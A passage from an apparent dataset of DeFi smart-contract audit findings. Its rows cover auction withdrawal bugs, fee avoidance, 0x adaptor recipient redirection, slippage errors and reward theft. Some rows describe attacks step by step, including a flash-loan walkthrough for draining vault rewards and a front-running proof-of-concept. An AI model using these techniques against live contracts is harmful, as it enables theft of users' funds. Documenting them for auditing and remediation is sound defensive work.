first order is processed, totalContractsSold > auction.totalContracts so the condition on line 313 passes. Since totalContractsSold > auction.totalContracts the calculation on line 318 underflows and the transaction reverts. The `_previewWithdraw` function and thus the `_withdraw` function is uncallable.\\nTest code added to `Auction.behaviour.ts`, under the `#addLimitOrder(uint64,int128,uint256)` section:\\n```\\n it(""previewWithdraw reverts if buyer has too many contracts"", async () => {\\n assert.isEmpty(await auction.getEpochsByBuyer(addresses.buyer1));\\n\\n await asset\\n .connect(signers.buyer1)\\n .approve(addresses.auction, ethers.constants.MaxUint256);\\n\\n const totalContracts = await auction.getTotalContracts(epoch);\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.mul(2)\\n );\\n\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.div(2)\\n );\\n\\n const epochByBuyer = await auction.getEpochsByBuyer(addresses.buyer1);\\n\\n assert.equal(epochByBuyer.length, 1);\\n assert.bnEqual(epochByBuyer[0], epoch);\\n \\n await expect(auction.callStatic[\\n ""previewWithdraw(uint64)""\\n ](epoch)).to.be.reverted;\\n });\\n```\\n\\nThe test code above shows a buyer is able to add an order with size auction.totalContracts*2 and a subsequent order with size auction.totalContracts/2. The `previewWithdraw` function reverts when called.","The loop in `_previewWithdraw` should check if the current totalContractsSold is >= totalContracts. If it is then the remainder should be set to 0 which would allow the current order to be fully refunded.\\nAdditionally, the orders for an auction should be checked before the auction starts. In `_addOrder`, consider adding a condition that will call `_processOrders` if the auction has not started yet. If `_processOrders` returns true then do not allow the order to be added. Or just allow the auction to be finalized before it starts if the total contracts sold has reached the auction's totalContracts.",Users would be unable to withdraw from the Auction contract.,"```\\n it(""previewWithdraw reverts if buyer has too many contracts"", async () => {\\n assert.isEmpty(await auction.getEpochsByBuyer(addresses.buyer1));\\n\\n await asset\\n .connect(signers.buyer1)\\n .approve(addresses.auction, ethers.constants.MaxUint256);\\n\\n const totalContracts = await auction.getTotalContracts(epoch);\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.mul(2)\\n );\\n\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.div(2)\\n );\\n\\n const epochByBuyer = await auction.getEpochsByBuyer(addresses.buyer1);\\n\\n assert.equal(epochByBuyer.length, 1);\\n assert.bnEqual(epochByBuyer[0], epoch);\\n \\n await expect(auction.callStatic[\\n ""previewWithdraw(uint64)""\\n ](epoch)).to.be.reverted;\\n });\\n```\\n" +Users can avoid performance fees by withdrawing before the end of the epoch forcing other users to pay their fees,medium,"No performance fees are taken when user withdraws early from the vault but their withdrawal value will be used to take fees, which will be taken from other users.\\n```\\nuint256 adjustedTotalAssets = _totalAssets() + l.totalWithdrawals;\\n\\nif (adjustedTotalAssets > l.lastTotalAssets) {\\n netIncome = adjustedTotalAssets - l.lastTotalAssets;\\n\\n feeInCollateral = l.performanceFee64x64.mulu(netIncome);\\n\\n ERC20.safeTransfer(l.feeRecipient, feeInCollateral);\\n}\\n```\\n\\nWhen taking the performance fees, it factors in both the current assets of the vault as well as the total value of withdrawals that happened during the epoch. Fees are paid from the collateral tokens in the vault, at the end of the epoch. Paying the fees like this reduces the share price of all users, which effectively works as a fee applied to all users. The problem is that withdraws that take place during the epoch are not subject to this fee and the total value of all their withdrawals are added to the adjusted assets of the vault. This means that they don't pay any performance fee but the fee is still taken from the vault collateral. In effect they completely avoid the fee force all there other users of the vault to pay it for them.",Fees should be taken on withdrawals that occur before vault is settled,User can avoid performance fees and force other users to pay them,"```\\nuint256 adjustedTotalAssets = _totalAssets() + l.totalWithdrawals;\\n\\nif (adjustedTotalAssets > l.lastTotalAssets) {\\n netIncome = adjustedTotalAssets - l.lastTotalAssets;\\n\\n feeInCollateral = l.performanceFee64x64.mulu(netIncome);\\n\\n ERC20.safeTransfer(l.feeRecipient, feeInCollateral);\\n}\\n```\\n" +processAuction() in VaultAdmin.sol can be called multiple times by keeper if the auction is canceled.,medium,"processAuction() in VaultAdmin.sol can be called multiple times by keeper if the auction is canceled.\\nprocessAuction() in VaultAdmin.sol can be called multiple times by keeper, the code below would execute more than one times if the auction is canceled.\\nbecause it is the line of code inside the function processAuction in VaultAdmin.sol below that can change the auction status to PROCESSED.\\nthis code only runs when the auction is finalized, it not finalized, the auction is in Canceled State and\\n```\\n bool cancelled = l.Auction.isCancelled(lastEpoch);\\n bool finalized = l.Auction.isFinalized(lastEpoch);\\n\\n require(\\n (!finalized && cancelled) || (finalized && !cancelled),\\n ""auction is not finalized nor cancelled""\\n );\\n```\\n\\nwould always pass because the auction is in cancel state.",Issue processAuction() in VaultAdmin.sol can be called multiple times by keeper if the auction is canceled.\\nWe recommend the project lock the epoch and make it impossible for keeper to call the processAuction again.,"Why the processAuction should not be called multiple times?\\nIn the first time it is called, the withdrawal lock is released so user can withdraw fund,\\n```\\n // deactivates withdrawal lock\\n l.auctionProcessed = true;\\n```\\n\\nthen if we called again, the lastTotalAssets can be updated multiple times.\\n```\\n // stores the last total asset amount, this is effectively the amount of assets held\\n // in the vault at the start of the auction\\n l.lastTotalAssets = _totalAssets();\\n```\\n\\nthe total asset can be lower and lower because people are withdrawing their fund.\\nthen when _collectPerformanceFee is called, the performance may still be collected","```\\n bool cancelled = l.Auction.isCancelled(lastEpoch);\\n bool finalized = l.Auction.isFinalized(lastEpoch);\\n\\n require(\\n (!finalized && cancelled) || (finalized && !cancelled),\\n ""auction is not finalized nor cancelled""\\n );\\n```\\n" +`TradingUtils._executeTrade()` doesn't check `preTradeBalance` properly.,high,"`TradingUtils._executeTrade()` doesn't check `preTradeBalance` properly.\\n`TradingUtils._executeTrade()` doesn't check `preTradeBalance` properly.\\n```\\nfunction _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n) private {\\n uint256 preTradeBalance;\\n\\n if (trade.sellToken == address(Deployments.WETH) && spender == Deployments.ETH_ADDRESS) {\\n preTradeBalance = address(this).balance;\\n // Curve doesn't support Deployments.WETH (spender == address(0))\\n uint256 withdrawAmount = _isExactIn(trade) ? trade.amount : trade.limit;\\n Deployments.WETH.withdraw(withdrawAmount);\\n } else if (trade.sellToken == Deployments.ETH_ADDRESS && spender != Deployments.ETH_ADDRESS) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n // UniswapV3 doesn't support ETH (spender != address(0))\\n uint256 depositAmount = _isExactIn(trade) ? trade.amount : trade.limit;\\n Deployments.WETH.deposit{value: depositAmount }();\\n }\\n\\n (bool success, bytes memory returnData) = target.call{value: msgValue}(params);\\n if (!success) revert TradeExecution(returnData);\\n\\n if (trade.buyToken == address(Deployments.WETH)) {\\n if (address(this).balance > preTradeBalance) {\\n // If the caller specifies that they want to receive Deployments.WETH but we have received ETH,\\n // wrap the ETH to Deployments.WETH.\\n uint256 depositAmount;\\n unchecked { depositAmount = address(this).balance - preTradeBalance; }\\n Deployments.WETH.deposit{value: depositAmount}();\\n }\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS) {\\n uint256 postTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n if (postTradeBalance > preTradeBalance) {\\n // If the caller specifies that they want to receive ETH but we have received Deployments.WETH,\\n // unwrap the Deployments.WETH to ETH.\\n uint256 withdrawAmount;\\n unchecked { withdrawAmount = postTradeBalance - preTradeBalance; }\\n Deployments.WETH.withdraw(withdrawAmount);\\n }\\n }\\n}\\n```\\n\\nIt uses `preTradeBalance` to manage the WETH/ETH deposits and withdrawals.\\nBut it doesn't save the correct `preTradeBalance` for some cases.\\nLet's assume `trade.sellToken = some ERC20 token(not WETH/ETH), trade.buyToken = WETH`\\nBefore executing the trade, `preTradeBalance` will be 0 as both `if` conditions are false.\\nThen all ETH inside the contract will be converted to WETH and considered as a `amountBought` here and here.\\nAfter all, all ETH of the contract will be lost.\\nAll WETH of the contract will be lost also when `trade.sellToken = some ERC20 token(not WETH/ETH), trade.buyToken = ETH` here.",We should check `preTradeBalance` properly. We can remove the current code for `preTradeBalance` and insert the below code before executing the trade.\\n```\\nif (trade.buyToken == address(Deployments.WETH)) {\\n preTradeBalance = address(this).balance;\\n} else if (trade.buyToken == Deployments.ETH_ADDRESS) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n}\\n```\\n,All of ETH/WETH balance of the contract might be lost in some cases.,"```\\nfunction _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n) private {\\n uint256 preTradeBalance;\\n\\n if (trade.sellToken == address(Deployments.WETH) && spender == Deployments.ETH_ADDRESS) {\\n preTradeBalance = address(this).balance;\\n // Curve doesn't support Deployments.WETH (spender == address(0))\\n uint256 withdrawAmount = _isExactIn(trade) ? trade.amount : trade.limit;\\n Deployments.WETH.withdraw(withdrawAmount);\\n } else if (trade.sellToken == Deployments.ETH_ADDRESS && spender != Deployments.ETH_ADDRESS) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n // UniswapV3 doesn't support ETH (spender != address(0))\\n uint256 depositAmount = _isExactIn(trade) ? trade.amount : trade.limit;\\n Deployments.WETH.deposit{value: depositAmount }();\\n }\\n\\n (bool success, bytes memory returnData) = target.call{value: msgValue}(params);\\n if (!success) revert TradeExecution(returnData);\\n\\n if (trade.buyToken == address(Deployments.WETH)) {\\n if (address(this).balance > preTradeBalance) {\\n // If the caller specifies that they want to receive Deployments.WETH but we have received ETH,\\n // wrap the ETH to Deployments.WETH.\\n uint256 depositAmount;\\n unchecked { depositAmount = address(this).balance - preTradeBalance; }\\n Deployments.WETH.deposit{value: depositAmount}();\\n }\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS) {\\n uint256 postTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n if (postTradeBalance > preTradeBalance) {\\n // If the caller specifies that they want to receive ETH but we have received Deployments.WETH,\\n // unwrap the Deployments.WETH to ETH.\\n uint256 withdrawAmount;\\n unchecked { withdrawAmount = postTradeBalance - preTradeBalance; }\\n Deployments.WETH.withdraw(withdrawAmount);\\n }\\n }\\n}\\n```\\n" +Bought/Purchased Token Can Be Sent To Attacker's Wallet Using 0x Adaptor,high,"The lack of recipient validation against the 0x order within the 0x adaptor (ZeroExAdapter) allows the purchased/output tokens of the trade to be sent to the attacker's wallet.\\nBackground\\nHow does the emergency vault settlement process work?\\nAnyone can call the `settleVaultEmergency` function to trigger the emergency vault settlement as it is permissionless\\nThe `_getEmergencySettlementParams` function will calculate the excess BPT tokens within the vault to be settled/sold\\nThe amount of excess BPT tokens will be converted to an equivalence amount of strategy tokens to be settled\\nThe strategy tokens will be settled by withdrawing staked BPT tokens from Aura Finance back to the vault for redemption.\\nThe vault will then redeem the BTP tokens from Balancer to redeem its underlying assets (WETH and stETH)\\nThe primary and secondary assets of the vault are WETH and stETH respectively. The secondary asset (stETH) will be traded for the primary asset (WETH) in one of the supported DEXes. In the end, only the primary assets (WETH) should remain within the vault.\\nThe WETH within the vault will be sent to Notional, and Notional will mint the asset tokens (cEther) for the vault in return.\\nAfter completing the emergency vault settlement process, the vault will gain asset tokens (cEther) after settling/selling its excess BPT tokens.\\nIssue Description\\nThe caller of the `settleVaultEmergency` function can specify the trade parameters to sell the secondary tokens (stETH) for primary tokens (WETH) in any of the supported 5 DEX protocols (Curve, Balancer V2, Uniswap V2 & V3 and 0x) in Step 5 of the above emergency vault settlement process.\\nAfter analyzing the adaptors of 5 DEX protocols (Curve, Balancer V2, Uniswap V2 & V3 and 0x), it was observed that Curve, Balancer V2, Uniswap V2, and Uniswap V3 are designed in a way that the purchased tokens can only be returned to the vault.\\nTake the Uniswap V2 adaptor as an example. When the vault triggers the trade execution, it will always pass its own address `address(this)` `to` the `from` parameter of the `getExecutionData` function. The value of `from` parameter will be passed `to` the `to` parameter of Uniswap's `swapExactTokensForTokens` function, which indicates the recipient of the output/purchased tokens. Therefore, it is impossible for the caller `to` specify the recipient of the output tokens `to` another address. This is also the same for Curve, Balancer V2, and Uniswap V3.\\n```\\nFile: UniV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n..SNIP..\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n```\\n\\nHowever, this is not implemented for the 0x adaptor (ZeroExAdapter). The `from` of the `getExecutionData` is completely ignored, and the caller has the full flexibility of crafting an order that benefits the caller.\\n```\\nFile: ZeroExAdapter.sol\\nlibrary ZeroExAdapter {\\n /// @dev executeTrade validates pre and post trade balances and also\\n /// sets and revokes all approvals. We are also only calling a trusted\\n /// zero ex proxy in this case. Therefore no order validation is done\\n /// to allow for flexibility.\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 /* msgValue */,\\n bytes memory executionCallData\\n )\\n {\\n spender = Deployments.ZERO_EX;\\n target = Deployments.ZERO_EX;\\n // msgValue is always zero\\n executionCallData = trade.exchangeData;\\n }\\n}\\n```\\n\\nA number of features are supported by 0x. The full list of the supported features can be found here. Specifically, the following are the functions of attacker interest because it allows the attacker to configure the `recipient` parameter so that the bought tokens will be redirected to the attacker's wallet instead of the vault.\\nLiquidityProviderFeature - sellToLiquidityProvider\\n```\\n /// @dev Sells `sellAmount` of `inputToken` to the liquidity provider\\n /// at the given `provider` address.\\n /// @param inputToken The token being sold.\\n /// @param outputToken The token being bought.\\n /// @param provider The address of the on-chain liquidity provider\\n /// to trade with.\\n /// @param recipient The recipient of the bought tokens. If equal to\\n /// address(0), `msg.sender` is assumed to be the recipient.\\n /// @param sellAmount The amount of `inputToken` to sell.\\n /// @param minBuyAmount The minimum acceptable amount of `outputToken` to\\n /// buy. Reverts if this amount is not satisfied.\\n /// @param auxiliaryData Auxiliary data supplied to the `provider` contract.\\n /// @return boughtAmount The amount of `outputToken` bought.\\n function sellToLiquidityProvider(\\n IERC20TokenV06 inputToken,\\n IERC20TokenV06 outputToken,\\n ILiquidityProvider provider,\\n address recipient,\\n uint256 sellAmount,\\n uint256 minBuyAmount,\\n bytes calldata auxiliaryData\\n )\\n```\\n\\nUniswapV3Feature - sellTokenForTokenToUniswapV3\\n```\\n /// @dev Sell a token for another token directly against uniswap v3.\\n /// @param encodedPath Uniswap-encoded path.\\n /// @param sellAmount amount of the first token in the path to sell.\\n /// @param minBuyAmount Minimum amount of the last token in the path to buy.\\n /// @param recipient The recipient of the bought tokens. Can be zero for sender.\\n /// @return buyAmount Amount of the last token in the path bought.\\n function sellTokenForTokenToUniswapV3(\\n bytes memory encodedPath,\\n uint256 sellAmount,\\n uint256 minBuyAmount,\\n address recipient\\n )\\n```\\n\\nThe malicious user could perform the following actions to steal the assets:\\nAllow malicious users to specify the recipient of the output/purchased tokens to be themselves instead of the vault. This will cause the output/purchased tokens of the trade to be redirected to the malicious users instead of the vault\\nSpecify the `minBuyAmount` parameter of the order to `1 WEI` so that he only needs to provide `1 WEI` to fill the order to obtain all the secondary token (stETH) that need to be sold. This is allowed as there is no slippage control within 0x adaptor (Refer to my ""No Slippage Control If The Trade Executes Via 0x DEX During Emergency Vault Settlement"" issue write-up)","It is recommended to implement validation against the submitted 0x trade order to ensure that the recipient of the bought tokens is set to the vault when using the 0x DEX. Consider implementing the following validation checks.\\n```\\nlibrary ZeroExAdapter {\\n /// @dev executeTrade validates pre and post trade balances and also\\n /// sets and revokes all approvals. We are also only calling a trusted\\n /// zero ex proxy in this case. Therefore no order validation is done\\n /// to allow for flexibility.\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 /* msgValue */,\\n bytes memory executionCallData\\n )\\n {\\n spender = Deployments.ZERO_EX;\\n target = Deployments.ZERO_EX;\\n \\n _validateExchangeData(from, trade);\\n \\n // msgValue is always zero\\n executionCallData = trade.exchangeData;\\n }\\n \\n function _validateExchangeData(address from, Trade calldata trade) internal pure {\\n bytes calldata _data = trade.exchangeData;\\n\\n address inputToken;\\n address outputToken;\\n address recipient;\\n uint256 inputTokenAmount;\\n uint256 minOutputTokenAmount;\\n\\n require(_data.length >= 4, ""Invalid calldata"");\\n bytes4 selector;\\n assembly {\\n selector := and(\\n // Read the first 4 bytes of the _data array from calldata.\\n calldataload(add(36, calldataload(164))), // 164 = 5 * 32 + 4\\n 0xffffffff00000000000000000000000000000000000000000000000000000000\\n )\\n }\\n \\n if (selector == 0xf7fcd384) {\\n \\n (\\n inputToken, \\n outputToken, \\n , \\n recipient, \\n inputTokenAmount, \\n minOutputTokenAmount\\n ) = abi.decode(_data[4:], (address, address, address, address, uint256, uint256));\\n require(recipient == from, ""Mismatched recipient"");\\n } else if (selector == 0x6af479b2) {\\n // sellTokenForTokenToUniswapV3()\\n bytes memory encodedPath;\\n // prettier-ignore\\n (\\n encodedPath,\\n inputTokenAmount, \\n minOutputTokenAmount, \\n recipient\\n ) = abi.decode(_data[4:], (bytes, uint256, uint256, address));\\n require(recipient == from, ""Mismatched recipient"");\\n }\\n }\\n}\\n```\\n","Attackers can craft a 0x order that redirects the assets to their wallet, leading to loss of assets for the vaults and their users.","```\\nFile: UniV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n..SNIP..\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n```\\n" +Settlement slippage is not implemented correctly which may lead to some vaults being impossible to settle,high,"The contract is supposed to implement a different max slippage value depending on the settlement type, but these values have no impact because they are never actually applied. Instead, regardless of settlement type or function inputs, max slippage will always be limited to the value of balancerPoolSlippageLimitPercent. This can be problematic because the default value allows only 1% slippage. If settlement slippage goes outside of 1% then settlement of any kind will become impossible.\\nBoosted3TokenAuraHelper.sol#L95-L99\\n```\\n params.minPrimary = poolContext._getTimeWeightedPrimaryBalance(\\n oracleContext, strategyContext, bptToSettle\\n );\\n\\n params.minPrimary = params.minPrimary * strategyContext.vaultSettings.balancerPoolSlippageLimitPercent / \\n uint256(BalancerConstants.VAULT_PERCENT_BASIS);\\n```\\n\\nBoosted3TokenAuraHelper#_executeSettlement first sets params.minPrimary overwriting any value from function input. Next it adjusts minPrimary by balancerPoolSlippageLimitPercent, which is a constant set at pool creation; however it doesn't ever adjust it by Params.DynamicTradeParams.oracleSlippagePercent. This means that the max possible slippage regardless of settlement type is limited to the slippage allowed by balancerPoolSlippageLimitPercent. If the max slippage ever goes outside of this range, then settlement of any kind will become impossible.","Params.DynamicTradeParams.oracleSlippagePercent is validated in every scenario before Boosted3TokenAuraHelper#_executeSettlement is called, so we can apply these values directly when calculating minPrimary:\\n```\\n params.minPrimary = poolContext._getTimeWeightedPrimaryBalance(\\n oracleContext, strategyContext, bptToSettle\\n );\\n\\n+ DynamicTradeParams memory callbackData = abi.decode(\\n+ params.secondaryTradeParams, (DynamicTradeParams)\\n+ );\\n\\n- params.minPrimary = params.minPrimary * strategyContext.vaultSettings.balancerPoolSlippageLimitPercent / \\n+ params.minPrimary = params.minPrimary * \\n+ (strategyContext.vaultSettings.balancerPoolSlippageLimitPercent - callbackData.oracleSlippagePercent) / \\n uint256(BalancerConstants.VAULT_PERCENT_BASIS);\\n```\\n",Settlement may become impossible,"```\\n params.minPrimary = poolContext._getTimeWeightedPrimaryBalance(\\n oracleContext, strategyContext, bptToSettle\\n );\\n\\n params.minPrimary = params.minPrimary * strategyContext.vaultSettings.balancerPoolSlippageLimitPercent / \\n uint256(BalancerConstants.VAULT_PERCENT_BASIS);\\n```\\n" +Gain From Balancer Vaults Can Be Stolen,medium,"The BPT gain (rewards) of the vault can be stolen by an attacker.\\nAt T0 (Time 0), assume that the state of the WETH/wstETH MetaPool Vault is as follows:\\ntotalBPTHeld = 1000 BPT\\ntotalStrategyTokenGlobal = 1000\\n1 Strategy Token can claim 1 BPT\\nAlice holds 1000 Strategy Tokens, and she is the only person invested in the vault at this point in time\\nAssume that if the `reinvestReward` is called, it will reinvest 1000 BPT back into the vault. Thus, if the `reinvestReward` is called, the `totalBPTHeld` of the vault will become 2000 BPT.\\nFollowing is the description of the attack:\\nThe attacker notice that if the `reinvestReward` is called, it will result in a large increase in the total BPT held by the vault\\nThe attacker flash-loan a large amount of WETH (e.g. 1,000,000) from a lending protocol (e.g. dydx)\\nEnter the vault by depositing 1,000,000 WETH by calling the `VaultAccountAction.enterVault` function. However, do not borrow any cash from Notional by setting the `fCash` parameter of the `VaultAccountAction.enterVault` function to `0`.\\nThere is no need to borrow from Notional as the attacker could already flash-loan a large amount of WETH with a non-existence fee rate (e.g. 1 Wei in dydx). Most importantly, the vault fee will only be charged if the user borrows from Notional. The fee is assessed within the `VaultAccount._borrowIntoVault`, which will be skipped if users are not borrowing. By not borrowing from Notional, the attacker does not need to pay any fee when entering the vault and this will make the attacker more profitable.\\nThe vault will deposit 1,000,000 WETH to the Balancer pool and receive a large amount of BPT in return. For simplicity's sake, assume that the vault receives 1,000,000 BPT in return.\\nBased on the `StrategyUtils._convertBPTClaimToStrategyTokens` function, the attacker will receive 100,000 strategy tokens. The state of the vault will be as follows after the attacker deposits:\\ntotalBPTHeld = 1,001,000 BPT\\ntotalStrategyTokenGlobal = 1,001,000\\n1 Strategy Token can claim 1 BPT\\nAlice holds 1000 Strategy Tokens\\nAttacker holds 1,000,000 Strategy Tokens\\nThe attacker calls the `reinvestReward` function, and reward tokens will be reinvested. Assume that the vault receives 1000 BPT. The state of the vault will be as follows after the reinvest:\\ntotalBPTHeld = 1,002,000 BPT\\ntotalStrategyTokenGlobal = 1,001,000\\n1 Strategy Token can claim ~1.0009 BPT\\nAlice holds 1000 Strategy Tokens\\nAttacker holds 1,000,000 Strategy Tokens\\nThe attacker exits the vault with all his strategy tokens by calling the `VaultAccountAction.exitVault` function. This will cause the vault the redeem all the 100,000 Strategy Tokens owned by the attacker. Based on the `StrategyUtils._convertStrategyTokensToBPTClaim` function, the attacker will receive 1,000,999 BPT in return. Note that there is no fee for exiting the vault and there is no need for repaying the debt as the attacker did not borrow any assets from Notional at the beginning.\\n```\\nbptClaim = (strategyTokenAmount * context.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n1,000,999 = (1000000 * 1002000) / 1001000\\n```\\n\\nProceed to repay the flash-loan at the end of the transaction. All the above steps are executed within a single transaction. Within a single transaction/block, the attacker is able to increase his holding of 1,000,000 BPT to 1,000,999 BPT after calling the `reinvestReward` function, and effectively gain around 999 BPT.\\nAlice who had been invested in the vault since the vault was first launched should be entitled to the majority of the rewards (Close to 1000 BPT). However, the attacker who came in right before the `reinvestReward` function was triggered managed to obtain almost all of her allocated shares of rewards (999 BPT) and left only 1 BPT for Alice.\\nNote: A flash-loan is not required if the attacker has sufficient liquidity to carry out the attack or the vault does not have much liquidity.\\nFollowing are the two functions for converting between BPT and Strategy Token for reference.\\n```\\n/// @notice Converts BPT to strategy tokens\\nfunction _convertBPTClaimToStrategyTokens(StrategyContext memory context, uint256 bptClaim)\\n internal pure returns (uint256 strategyTokenAmount) {\\n if (context.totalBPTHeld == 0) {\\n // Strategy tokens are in 8 decimal precision, BPT is in 18. Scale the minted amount down.\\n return (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / \\n BalancerConstants.BALANCER_PRECISION;\\n }\\n\\n // BPT held in maturity is calculated before the new BPT tokens are minted, so this calculation\\n // is the tokens minted that will give the account a corresponding share of the new bpt balance held.\\n // The precision here will be the same as strategy token supply.\\n strategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.totalBPTHeld;\\n}\\n```\\n\\n```\\n/// @notice Converts strategy tokens to BPT\\nfunction _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n}\\n```\\n","Following are the list of root causes of the issue and some recommendation to mitigate them.\\n`reinvestReward` function is permissionless and can be called by anyone. It is recommended to implement access control to ensure that this function can only be triggered by Notional. Do note that even if the attacker cannot trigger the `reinvestReward` function, it is still possible for the attacker to front-run and back-end the `reinvestReward` transaction to carry out the attack if they see this transaction in the public mempool. Thus, consider sending the `reinvestReward` transaction as a private transaction via Flashbot so that the attacker cannot sandwich the transaction.\\nThere is no withdrawal fee. Also, there is no deposit fee as long as users did not borrow from Notional. Therefore, this attack is mostly profitable. It is recommended to impose a fee on the users of the vault even if the users did not borrow from Notional. All users should be charged a fee for the use of the vault. This will make the attack less likely to be profitable in most cases.\\nUsers can enter and exit the vault within the same transaction/block. This allows the attacker to leverage the flash-loan facility to reduce the cost of the attack to almost nothing. It is recommended to prevent users from entering and exiting the vault within the same transaction/block. If the user entered the vault in this block, he/she could only exit at the next block.\\nThere is no snapshotting to keep track of the deposit to ensure that BPT gain/rewards distributions are weighted according to deposit duration. Thus, a whale could deposit right before the `reinvestReward` function is triggered and exit the vault afterward and reap most of the gains. Consider implementing snapshotting within the vault.",Loss of assets for the users as their BPT gain (rewards) can be stolen. This issue affects all balancer-related vaults that contain the permissionless `reinvestReward` function.,"```\\nbptClaim = (strategyTokenAmount * context.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n1,000,999 = (1000000 * 1002000) / 1001000\\n```\\n" +Malicious Users Can Deny Notional Treasury From Receiving Fee,medium,"Malicious users can deny Notional Treasury from receiving fees when rewards are reinvested.\\nThe `claimRewardTokens` function will harvest the reward tokens from the Aura Pool, and the reward tokens will be transferred to the Balancer Vault. At lines 77-78, a portion of the reward tokens would be sent to the `FEE_RECEIVER`. After clarifying with the sponsor, it was understood that the `FEE_RECEIVER` would be set to Notional Treasury so that it would receive some of the accrued reward tokens.\\n```\\nFile: AuraStakingMixin.sol\\n function claimRewardTokens() external returns (uint256[] memory claimedBalances) {\\n uint16 feePercentage = BalancerVaultStorage.getStrategyVaultSettings().feePercentage;\\n IERC20[] memory rewardTokens = _rewardTokens();\\n\\n uint256 numRewardTokens = rewardTokens.length;\\n\\n claimedBalances = new uint256[](numRewardTokens);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this));\\n }\\n\\n AURA_REWARD_POOL.getReward(address(this), true);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this)) - claimedBalances[i];\\n\\n if (claimedBalances[i] > 0 && feePercentage != 0 && FEE_RECEIVER != address(0)) {\\n uint256 feeAmount = claimedBalances[i] * feePercentage / BalancerConstants.VAULT_PERCENT_BASIS;\\n rewardTokens[i].checkTransfer(FEE_RECEIVER, feeAmount);\\n claimedBalances[i] -= feeAmount;\\n }\\n }\\n\\n emit BalancerEvents.ClaimedRewardTokens(rewardTokens, claimedBalances);\\n }\\n```\\n\\nWithin the `claimRewardTokens` function, it will call the `AURA_REWARD_POOL.getReward` to harvest the reward tokens. Within the `claimRewardTokens` function, it also uses the pre-balance and post-balance of the reward tokens to check the actual amount of reward tokens that are transferred into the vault.\\nHowever, the issue is that anyone can claim reward tokens from Aura Pool on behalf of any address. Following is the implementation of the `getReward` function taken from Aura's BaseRewardPool4626 contract called by the vault for reference.\\n```\\n/**\\n * @dev Gives a staker their rewards, with the option of claiming extra rewards\\n * @param _account Account for which to claim\\n * @param _claimExtras Get the child rewards too?\\n */\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n\\nmodifier updateReward(address account) {\\n rewardPerTokenStored = rewardPerToken();\\n lastUpdateTime = lastTimeRewardApplicable();\\n if (account != address(0)) {\\n rewards[account] = earned(account);\\n userRewardPerTokenPaid[account] = rewardPerTokenStored;\\n }\\n _;\\n}\\n\\nfunction earned(address account) public view returns (uint256) {\\n return\\n balanceOf(account)\\n .mul(rewardPerToken().sub(userRewardPerTokenPaid[account]))\\n .div(1e18)\\n .add(rewards[account]);\\n}\\n```\\n\\nAssume that a malicious user front runs a call to claim rewards tokens. When a keeper calls the `AURA_REWARD_POOL.getReward` to harvest the reward tokens, it will return no reward tokens, and therefore the difference between the pre-balance and post-balance of the reward tokens will amount to zero. Therefore, no reward tokens will be sent to the `FEE_RECEIVER` (Notional Treasury) as a fee.\\nProof-of-Concept\\nThe `test_claim_rewards_success` test case shows that under normal circumstances, the Notional treasury will receive a portion of the accrued BAL and AURA as fees.\\nThe `test_claim_rewards_success_frontrun` test case shows that if the `getReward` is front-run by an attacker, the Notional treasury will receive nothing.\\nThe following is the test script and its result.\\n```\\nimport pytest\\nfrom brownie import ZERO_ADDRESS, Wei, accounts, interface\\nfrom tests.fixtures import *\\nfrom tests.balancer.helpers import enterMaturity, get_metastable_amounts\\nfrom scripts.common import get_univ3_single_data, get_univ3_batch_data, DEX_ID, TRADE_TYPE\\n\\nchain = Chain()\\n\\ndef test_claim_rewards_success(StratStableETHstETH):\\n (env, vault) = StratStableETHstETH\\n primaryBorrowAmount = 100e8\\n depositAmount = 50e18\\n enterMaturity(env, vault, 1, 